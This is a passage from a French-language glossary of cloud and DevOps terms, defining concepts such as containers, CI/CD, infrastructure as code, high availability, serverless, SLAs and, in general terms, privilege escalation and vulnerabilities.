contrĂŽle (control plane) et de plusieurs nƓuds de travail. Les clusters offrent une haute disponibilitĂ© et une scalabilitĂ© en rĂ©partissant les charges de travail sur plusieurs machines. CMP Une CMP (Cloud Management Platform) dĂ©signe une plateforme logicielle conçue pour gĂ©rer et orchestrer les ressources, services et opĂ©rations dans un environnement cloud. Conteneurs / Conteneurisation Un conteneur est une unitĂ© d’exĂ©cution autonome qui regroupe une application, ses dĂ©pendances logicielles et toutes les ressources nĂ©cessaires Ă  son exĂ©cution, y compris des bibliothĂšques, des fichiers de configuration et des variables d’environnement. Les conteneurs sont conçus pour isoler une application et son environnement de maniĂšre Ă  ce qu’elle puisse ĂȘtre dĂ©ployĂ©e et exĂ©cutĂ©e de maniĂšre cohĂ©rente. Cette technologie permet de porter une application sur n’importe quel serveur, local ou dans le cloud, Ă  la seule condition de possĂ©der la mĂȘme architecture et la mĂȘme famille de systĂšme d’exploitation. CRD (Custom Resource Definition) Une CRD permet de dĂ©finir des ressources personnalisĂ©es dans Kubernetes. Cela permet aux utilisateurs d’étendre les fonctionnalitĂ©s de Kubernetes en ajoutant de nouveaux types d’objets spĂ©cifiques Ă  leurs besoins. DĂ©claratif vs ImpĂ©ratif Dans une approche dĂ©clarative , le code de configuration dĂ©crit l’état dans lequel l’environnement de production doit se trouver, sans prendre en compte les Ă©tapes pour y arriver. Le systĂšme fait en sorte que l’infrastructure atteigne l’état dĂ©sirĂ©. Dans une approche impĂ©rative , le fichier de configuration dĂ©finit les commandes et les Ă©tapes nĂ©cessaires pour que l’environnement parvienne Ă  l’état dĂ©sirĂ©. Le systĂšme rĂ©alise les commandes indiquĂ©es. Exemple : Ansible DĂ©ploiement Blue-Green Une mĂ©thode de dĂ©ploiement qui permet de basculer en douceur entre deux environnements (bleu et vert) pour minimiser les interruptions de service. DĂ©ploiement Continu DĂ©ploiement ou livraison continue est une mĂ©thode de dĂ©veloppement de logiciels dans le cadre de laquelle les modifications de code sont automatiquement prĂ©parĂ©es en vue de leur publication dans un environnement de production. La livraison continue Ă©tend le principe de l’intĂ©gration continue en dĂ©ployant tous les changements de code dans un environnement de test et/ou de production aprĂšs l’étape de crĂ©ation. Lorsque la livraison continue est correctement implĂ©mentĂ©e, les dĂ©veloppeurs disposent en permanence d’un artefact de gĂ©nĂ©ration prĂȘt pour le dĂ©ploiement qui a Ă©tĂ© soumis avec succĂšs Ă  un processus de test standardisĂ©. Dette Technique La dette technique est une mĂ©taphore utilisĂ©e pour dĂ©crire le coĂ»t cachĂ© associĂ© au retard ou Ă  la nĂ©gligence des bonnes pratiques de dĂ©veloppement, de maintenance et de gestion des systĂšmes informatiques. Cela se produit lorsque des raccourcis, des compromis ou des dĂ©cisions techniques inadĂ©quates sont pris pour accĂ©lĂ©rer le dĂ©veloppement d’un logiciel ou pour rĂ©pondre Ă  des Ă©chĂ©ances serrĂ©es. La dette technique est le reflet des consĂ©quences nĂ©gatives de ces choix Ă  long terme. DevSecOps IntĂ©gration de la sĂ©curitĂ© dans les pipelines CI/CD dĂšs le dĂ©but du dĂ©veloppement. Edge Computing Le Edge Computing est une architecture informatique dĂ©centralisĂ©e qui rapproche les ressources de calcul et de traitement des donnĂ©es des pĂ©riphĂ©riques ou des utilisateurs finaux. Cette approche est couramment utilisĂ©e pour rĂ©duire la latence et la consommation de bande passante dans des environnements distribuĂ©s comme l’IoT ou les systĂšmes connectĂ©s. ÉlasticitĂ© L’élasticitĂ© est la capacitĂ© d’un systĂšme informatique d’ajuster dynamiquement les ressources (comme la puissance de calcul, la mĂ©moire, le stockage, etc.) en fonction de la demande des utilisateurs. ÉlĂ©vation de privilĂšges L’élĂ©vation de privilĂšges (ou privilege escalation en anglais) fait rĂ©fĂ©rence au processus par lequel un utilisateur ou un processus tente d’acquĂ©rir des privilĂšges ou des autorisations supplĂ©mentaires au sein d’un systĂšme informatique, lui permettant ainsi d’exĂ©cuter des actions pour lesquelles il n’avait pas initialement les droits. L’élĂ©vation de privilĂšges est Ă©galement un sujet important dans le domaine de la sĂ©curitĂ© informatique, car les vulnĂ©rabilitĂ©s qui permettent une Ă©lĂ©vation de privilĂšges peuvent ĂȘtre exploitĂ©es pour compromettre la sĂ©curitĂ© d’un systĂšme. Les correctifs de sĂ©curitĂ© sont souvent publiĂ©s pour corriger de telles vulnĂ©rabilitĂ©s et empĂȘcher les attaquants d’acquĂ©rir des privilĂšges non autorisĂ©s. Gestion des configurations La gestion de configuration est un concept fondamental dans l’administration des systĂšmes et des infrastructures informatiques. Elle englobe l’ensemble des processus et des outils utilisĂ©s pour dĂ©finir, mettre en place, surveiller et maintenir les configurations, qu’il s’agisse de serveurs, de postes de travail, de logiciels ou d’équipements rĂ©seaux. Gestionnaire de ContrĂŽle de version Un gestionnaire de contrĂŽle de version, Ă©galement appelĂ© logiciel de gestion de version ou systĂšme de contrĂŽle de version (VCS), est un outil informatique qui permet de suivre et de gĂ©rer les modifications apportĂ©es Ă  un ensemble de fichiers au fil du temps. Son principal objectif est de faciliter la collaboration entre plusieurs personnes travaillant sur un mĂȘme projet informatique, que ce soit un logiciel, un site web, une documentation. Le plus utilisĂ© actuellement s’appelle Git. Gestion des secrets La gestion des secrets dĂ©signe la pratique permettant de gĂ©rer de maniĂšre sĂ©curisĂ©e les informations sensibles, telles que les mots de passe, les clĂ©s d’authentification, les jetons d’accĂšs, les clĂ©s de chiffrement et d’autres donnĂ©es confidentielles, utilisĂ©es dans les applications, les systĂšmes et les infrastructures informatiques. Cette pratique est essentielle pour garantir la sĂ©curitĂ© des systĂšmes d’informations, car toute faille dans la protection de ces donnĂ©es pourrait entraĂźner des violations de sĂ©curitĂ©, des accĂšs non autorisĂ©s, des pertes de donnĂ©es
 Haute DisponibilitĂ© La haute disponibilitĂ© (HA) est un concept en informatique qui se rĂ©fĂšre Ă  la capacitĂ© d’un systĂšme, d’une application ou d’un service Ă  rester opĂ©rationnel et accessible pendant une pĂ©riode de temps prolongĂ©e, gĂ©nĂ©ralement 24 heures sur 24 et 7 jours sur 7. L’objectif de la haute disponibilitĂ© est de minimiser les temps d’arrĂȘt non planifiĂ©s, d’assurer la continuitĂ© des opĂ©rations et de garantir que les utilisateurs finaux puissent accĂ©der aux ressources informatiques sans interruption notable. Pour atteindre un haut niveau de disponibilitĂ©, les organisations mettent en place des architectures redondantes, des clusters, des systĂšmes de basculement et des tests rigoureux de continuitĂ© des opĂ©rations. Cela garantit que les systĂšmes restent opĂ©rationnels mĂȘme en cas de dĂ©faillance matĂ©rielle, de coupures d’électricitĂ©, de catastrophes naturelles ou de cyberattaques. Helm Helm est un gestionnaire de packages pour Kubernetes. Il permet de simplifier l’installation, la gestion et la mise Ă  jour des applications Kubernetes en utilisant des charts (modĂšles de dĂ©ploiement). Helm est particuliĂšrement utile pour dĂ©ployer des applications complexes avec des dĂ©pendances multiples. IAAS IaaS est l’acronyme de “Infrastructure as a Service”, qui se traduit en français par “Infrastructure en tant que Service”. Il s’agit d’un modĂšle de cloud qui aux utilisateurs de provisionner des ressources d’infrastructures informatiques sous forme de services. Idempotence En algĂšbre, l’ idempotence est la propriĂ©tĂ© d’une opĂ©ration, d’avoir le mĂȘme effet qu’on l’applique une ou plusieurs fois. Par exemple, la valeur absolue est idempotente : abs(abs(−5)) = abs(−5), les deux membres Ă©tant Ă©gaux Ă  5. En programmation une fonction est idempotente si l’état du systĂšme reste le mĂȘme aprĂšs un ou plusieurs appels. Infrastructure as Code L’infrastructure en tant que code (Infrastructure as Code) est une infrastructure informatique virtuelle qui est créée, configurĂ©e et approvisionnĂ©e automatiquement via du code informatique. IntĂ©gration Continue CI ou intĂ©gration continue est une mĂ©thode de dĂ©veloppement avec laquelle les dĂ©veloppeurs intĂšgrent rĂ©guliĂšrement leurs modifications de code Ă  un rĂ©fĂ©rentiel centralisĂ©, suite Ă  quoi des opĂ©rations de crĂ©ation et de tests sont automatiquement menĂ©s. L’intĂ©gration continue dĂ©signe souvent l’étape de crĂ©ation ou d’intĂ©gration du processus de publication de logiciel et implique un aspect automatisĂ©. Les principaux objectifs de l’intĂ©gration continue sont de trouver et de corriger plus rapidement les bogues, d’amĂ©liorer la qualitĂ© des logiciels et de rĂ©duire le temps nĂ©cessaire pour valider et publier de nouvelles mises Ă  jour de logiciels. IPAM IPAM, acronyme de “IP Address Management” (Gestion des adresses IP en français), est un ensemble de pratiques, de techniques et d’outils utilisĂ©s pour planifier, gĂ©rer et suivre les adresses IP (Internet Protocol) au sein d’un rĂ©seau informatique. Load balancing ou Ă©quilibrage de charge Un Ă©quilibrage de charge, en anglais “load balancer”, est un composant matĂ©riel ou logiciel utilisĂ© dans les environnements informatiques pour distribuer le trafic rĂ©seau entrant de maniĂšre Ă©quilibrĂ©e entre plusieurs serveurs ou ressources, afin d’optimiser les performances, la fiabilitĂ© et la disponibilitĂ© des systĂšmes. Microservices vs Monolithe Une architecture microservices est une architecture logicielle basĂ©e sur de petits services autonomes qui peuvent ĂȘtre dĂ©veloppĂ©s, dĂ©ployĂ©s et Ă©voluĂ©s indĂ©pendamment. Cette architecture s’appuie sur des orchestrateurs de conteneurs. Un monolithe est une architecture logicielle oĂč l’ensemble de l’application est conçu et construit comme une seule entitĂ© monolithique. Cela signifie que toutes les fonctionnalitĂ©s, les composants et les parties de l’application sont regroupĂ©s en un seul code source, une seule base de donnĂ©es et un seul exĂ©cutable. MutabilitĂ© vs ImmutabilitĂ© ImmutabilitĂ© : CaractĂšre de ce qui ne peut changer . Une infrastructure mutable est un systĂšme qui Ă©volue de maniĂšre incrĂ©mentale et donc mise Ă  jour de maniĂšre continue. L’état de l’infrastructure est le rĂ©sultat d’une accumulation d’opĂ©rations pouvant ĂȘtre pour certaines manuelles. Par contre, une infrastructure immutable est un systĂšme qui n’est jamais modifiĂ© aprĂšs son dĂ©ploiement. Ce systĂšme devra en consĂ©quence avoir le moins de mutation possible, voire aucune. Par exemple, pour construire des images de VM immutables, vous pouvez utiliser Packer d’ HashiCorp pour ensuite les enregistrer en les versionnant dans votre gestionnaire d’ArtĂ©facts. NOC Un NOC (Network Operations Center) est un centre opĂ©rationnel chargĂ© de surveiller, gĂ©rer et maintenir un rĂ©seau informatique ou de tĂ©lĂ©communications. Les Ă©quipes du NOC supervisent les performances du rĂ©seau, dĂ©tectent et rĂ©solvent les problĂšmes et effectuent la maintenance prĂ©ventive pour assurer le bon fonctionnement continu du rĂ©seau. ObservabilitĂ© L’ observabilitĂ© est la capacitĂ© de surveiller, d’analyser et de comprendre l’état interne d’un systĂšme informatique en temps rĂ©el. Elle repose sur trois piliers principaux : les logs, les mĂ©triques et les traces. Des outils comme Prometheus et Grafana sont souvent utilisĂ©s pour l’observabilitĂ©. Orchestration L’orchestration est un processus automatique de gestion d’un systĂšme informatique. RPO Recovery Point Objective (RPO) fait gĂ©nĂ©ralement rĂ©fĂ©rence Ă  la quantitĂ© de donnĂ©es qui peuvent ĂȘtre perdues au cours de la pĂ©riode la plus opportune pour une entreprise, avant qu’un prĂ©judice important ne se produise, Ă  partir d’un Ă©vĂ©nement critique jusqu’à la sauvegarde la plus prĂ©cĂ©dente. RTO Recovery Time Objective (RTO) fait rĂ©fĂ©rence au temps pendant lequel une application, un systĂšme et/ou un processus peut ĂȘtre en panne sans causer de dommages importants Ă  l’entreprise, ainsi qu’au temps passĂ© Ă  restaurer l’application et ses donnĂ©es. PAAS PaaS, ou “Platform as a Service” en anglais, se traduit en français par “Plateforme en tant que Service”. C’est un modĂšle de cloud qui fournit une plateforme de dĂ©veloppement et d’exĂ©cution d’applications sur le cloud. Ces services vont permettre aux dĂ©veloppeurs de crĂ©er, dĂ©ployer et gĂ©rer des applications sans se soucier de la gestion de l’infrastructure sous-jacente. Provisioning ou Provisionnement Le provisioning est un processus d’allocation automatique de ressources informatiques. SAAS SaaS, ou “Software as a Service” en anglais, se traduit en français “logiciel en tant que service”. C’est un modĂšle de distribution de logiciels dans lequel les applications sont hĂ©bergĂ©es et accessibles en ligne par le biais d’un fournisseur de services cloud. Au lieu d’installer et de gĂ©rer des logiciels localement sur un ordinateur ou un serveur, les utilisateurs peuvent accĂ©der Ă  ces applications via Internet, gĂ©nĂ©ralement Ă  partir d’un navigateur web. Scrum Un framework de gestion de projet Agile. Serverless Le Serverless est un modĂšle de dĂ©ploiement dans lequel les dĂ©veloppeurs n’ont pas Ă  gĂ©rer l’infrastructure sous-jacente. Les fournisseurs cloud allouent dynamiquement les ressources nĂ©cessaires Ă  l’exĂ©cution d’une application. Les exemples incluent AWS Lambda , Google Cloud Functions , et Azure Functions . Service Mesh Un Service Mesh est une infrastructure dĂ©diĂ©e Ă  la gestion des communications entre microservices. Il fournit des fonctionnalitĂ©s comme le load balancing , la gestion des Ă©checs, le monitoring, et la sĂ©curisation des connexions via des proxies. Les outils populaires incluent Istio et Linkerd . SLA/SLO/SLI SLA (Service Level Agreement) : Contrat dĂ©finissant les attentes en termes de niveaux de service. SLO (Service Level Objective) : Objectifs prĂ©cis liĂ©s aux niveaux de performance d’un service (ex. : disponibilitĂ© Ă  99,9 %). SLI (Service Level Indicator) : Indicateur qui mesure un aspect de la performance, comme le temps de rĂ©ponse ou le taux d’erreur. SOC Un SOC (Security Operations Center) est similaire, mais se concentre spĂ©cifiquement sur la sĂ©curitĂ© informatique. Les Ă©quipes d’un SOC surveillent les menaces potentielles, dĂ©tectent les activitĂ©s suspectes, rĂ©pondent aux incidents de sĂ©curitĂ© et mettent en Ɠuvre des mesures de dĂ©fense pour protĂ©ger les systĂšmes informatiques et les donnĂ©es contre les cyberattaques. Supervision La supervision est un processus de surveillance et de gestion des systĂšmes informatiques, des rĂ©seaux, des serveurs, des applications et d’autres composants de l’infrastructure informatique. Elle vise Ă  garantir que ces systĂšmes fonctionnent de maniĂšre fiable, sĂ©curisĂ©e et efficace. La supervision informatique peut ĂȘtre effectuĂ©e Ă  l’aide de logiciels spĂ©cialisĂ©s qui collectent des donnĂ©es en temps rĂ©el sur les performances et l’état des Ă©quipements informatiques. Virtualisation La virtualisation est une technologie qui permet de crĂ©er des versions virtuelles de tous Ă©lĂ©ments d’une infrastructure informatique comme des serveurs, des Ă©quipements rĂ©seaux ou d’autres entitĂ©s informatiques. Elle vise Ă  isoler et Ă  abstraire ces Ă©lĂ©ments pour les rendre indĂ©pendants des ressources physiques sous-jacentes, ce qui permet une utilisation plus efficace et flexible de ces ressources. Elle est couramment utilisĂ©e dans des domaines tels que la virtualisation de serveur, la virtualisation de stockage, la virtualisation de rĂ©seau, la virtualisation de bureau et plus encore. VulnĂ©rabilitĂ© Une vulnĂ©rabilitĂ© est une faiblesse du code qui introduit ce qu’on appelle une faille de sĂ©curitĂ©. Ces failles peuvent ĂȘtre prĂ©sentes dans un systĂšme d’exploitation, un logiciel, un Ă©quipement de rĂ©seau ou un processus. Elles peuvent ĂȘtre exploitĂ©es par des acteurs malveillants pour causer un dommage, un accĂšs non autorisĂ©, des pertes de donnĂ©es, ou d’autres problĂšmes de sĂ©curitĂ©. Pour dĂ©tecter la prĂ©sence des vulnĂ©rabilitĂ©s, on fait appel Ă  des outils d’analyse de code et de dĂ©tection.